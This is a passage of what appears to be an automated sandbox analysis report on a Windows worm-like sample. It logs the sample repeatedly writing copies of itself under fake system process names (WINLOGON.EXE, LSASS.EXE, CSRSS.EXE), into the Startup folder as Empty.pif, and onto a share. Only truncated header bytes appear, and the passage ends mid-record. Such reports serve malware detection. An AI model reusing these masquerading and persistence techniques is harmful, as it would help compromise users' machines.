\"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46843 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46826 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46793 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46806 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 47012 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46878 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46835 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46713 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46867 bytes starting with PE header signature to file \"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46771 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46820 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46872 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46863 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46863 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46799 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46897 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46782 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46793 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 46862 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\D3_08\\New Folder.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\Data HAPUBWS.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46929 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46788 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46923 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46789 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46835 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46931 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46810 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46705 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46786 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46800 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46874 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46899 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46954 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46849 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46885 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 47007 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46747 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46871 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46872 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46855 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46858 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46766 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46815 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46788 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46857 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46897 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46830 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46848 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46938 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46755 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46939 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46742 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46928 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46785 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46902 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46810 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46807 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46747 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46960 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46844 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46880 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46820 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46692 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46875 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46822 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46941 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46841 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46864 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\services.exe]- [targetUID: 00000000-00003404]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\D3_08.exe]- [targetUID: 00000000-00005040]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\shell.exe]- [targetUID: 00000000-00005040]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\D3_08.exe]- [targetUID: 00000000-00005040]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\Data %OSUSER%.exe]- [targetUID: 00000000-00003404]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif]- [targetUID: 00000000-00005040]\n \"IEXPLORER.EXE.67EE4D17.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: 